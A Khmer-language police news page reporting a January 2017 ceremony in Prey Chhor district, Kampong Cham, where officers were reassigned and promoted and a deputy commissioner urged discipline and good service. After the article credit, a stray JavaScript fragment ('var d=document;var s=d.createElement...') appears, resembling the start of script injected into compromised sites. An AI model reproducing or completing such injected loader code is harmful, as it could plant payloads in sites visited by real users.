Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ពិធីប្រកាសផ្ទេរភារកិច្ច តែងតាំងមុខតំណែង និងបំពាក់ឋានន្តរសក្តិដល់មន្ត្រីនគរបាលជាតិនៃអធិការដ្ឋាននគរបាលស្រុកព្រៃឈរ កងមាស ស្រីសន្ធរ បាធាយ ចំការលើ ជើងព្រៃ

កំពង់ចាម: នារសៀលថ្ងៃទី១៩ ខែមករា ឆ្នាំ២០១៧ នៅអធិការដ្ឋានន.ប ស្រុកព្រៃឈរបានប្រារព្ធពិធីប្រកាសផ្ទេរភារកិច្ច តែងតាំងមុខតំណែង និងបំពាក់ឋានន្តរសក្តិដល់មន្ត្រីនគរបាលជាតិនៃអធិការដ្ឋាននគរបាលស្រុកព្រៃឈរ កងមាស ស្រីសន្ធរ បាធាយ ចំការលើ ជើងព្រៃ ក្រោមអធិបតីភាព លោកឧត្តមសេនីយ៍ត្រី ហេងសម្បត្តិ ស្នងការរងទទួលផែនសេធិការ តំណាង លោកឧត្តមសេនីយ៍ស្នងការនគរបាលខេត្ត លោកឧត្តមសេនីយ៍ត្រី សាន សុភា ស្នងការរងទទួលផែនធនធានមនុស្សនិងលោក ទេព រាមមុនី អភិបាល
ស្រុកព្រៃឈរ ដោយមានការចូលរួមពី លោក មេបញ្ជាការផ្នែកសឹករង លោកមេបញ្ជាការកងរាជអាវុធហត្ថ
លោក នាយរងការិយាល័យបុគ្គលិក លោកអធិការទាំង៦ស្រុក  លោកនាយប៉ុស្តិ សរុបចំនួន១៦៥នាក់។
ជាកិច្ចចាប់ផ្តេីមលោកវរសេនីយ៍ទោ ស្វាយ សុី ប៊ុណ្ណា នាយរងការិយាល័យបុគ្គលិក បានឡេីងអានសេចក្តីសម្រេចរបស់អគ្គស្នងការដ្ឋាននគរបាលជាតិ ស្តីពីការផ្ទេរភារកិច្វ តែងតាំងមុខតំណែង និតម្លេីងឋានន្តរសក្តិ សរុបចំនួន១៣៣នាក់ (ពីថ្នាក់អនុសេនីយ៍ឯក ដល់ព្រិន្ទបាលទោ)បន្ទាប់ពីលោក ទេព រាមមុនី អភិបាលស្រុកព្រៃឈរបានមានមតិសំណេះសំណាលដល់អង្គពិធីរួចមមកលោក ឧត្តមសេនីយ៍ត្រី ហេង សម្បត្តិស្នងការរងមានមតិសំណេះសំណាល ផ្តាំផ្ញើដល់មន្រ្តីនគរបាលដែលទេីបទទួលការតែងតាំងមុខតំណែង និងបំពាក់ឋានន្តរសក្តិថ្មី ឱយយកចិត្តទុកដាក់ខិតខំបពេញភារកិច្ច បំរើសេវាជូនប្រជាពលរដ្ឋ និងបំពេញភារកិច្ចជំនាញឲ្យកាន់តែល្អប្រសើរ។ លោកស្នងការរងបានផ្តាំផ្ញេីបន្ថែមដល់មន្រ្តីនគរបាលទាំងអស់នូវចណុចមួយចំនួនដូចខាងក្រោមៈ
១.ការគោរពវិន័យកងកំលាំងនគរបាលជាតិលេខ ០០៦ បបជ
២.ការកែប្រែឥរិយាបទរបស់មន្រ្តីនគបាលជាតិ
៣.ការបំរេីសេវាជូនបងប្អូនប្រជាពលរដ្ឋ
៤.ការទំនាក់ទំនងល្អជាមួយស្ថាប័នផ្សេងៗ
៥.ត្រូវយកចិត្តទុកដាក់អនុវត្តផែនការបង្ការ ទប់ស្កាត់បទល្មើសគ្រប់ប្រភេទក្នុងរដូវប្រាំងឆ្នាំ២០១៧ និងការពារក្នុងពិធីបុណ្យចូលឆ្នាំចិន វៀតណាមនាពេលខាងមុខនេះឲ្យបានល្អប្រសើរ។
ទីបញ្ចប់លោក ឧត្តមសេនីយ៍ស្នងការរង បានបញ្ជាក់ច្បាស់ ត្រូវរក្សាសាមគ្គីភាពផ្ទៃក្នុងអង្គភាពនិងក្រៅអង្គភាពឲ្យបានល្អប្រសើរ ព្រោះកត្តាសាមគ្គីភាពពិតជានាំមកនូវជោគជ័យសំរាប់យើងទាំងអស់គ្នា ។

អត្ថបទនិងរូបភាពៈ ការិយាល័យផ្សព្វផ្សាយអប់រំ

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More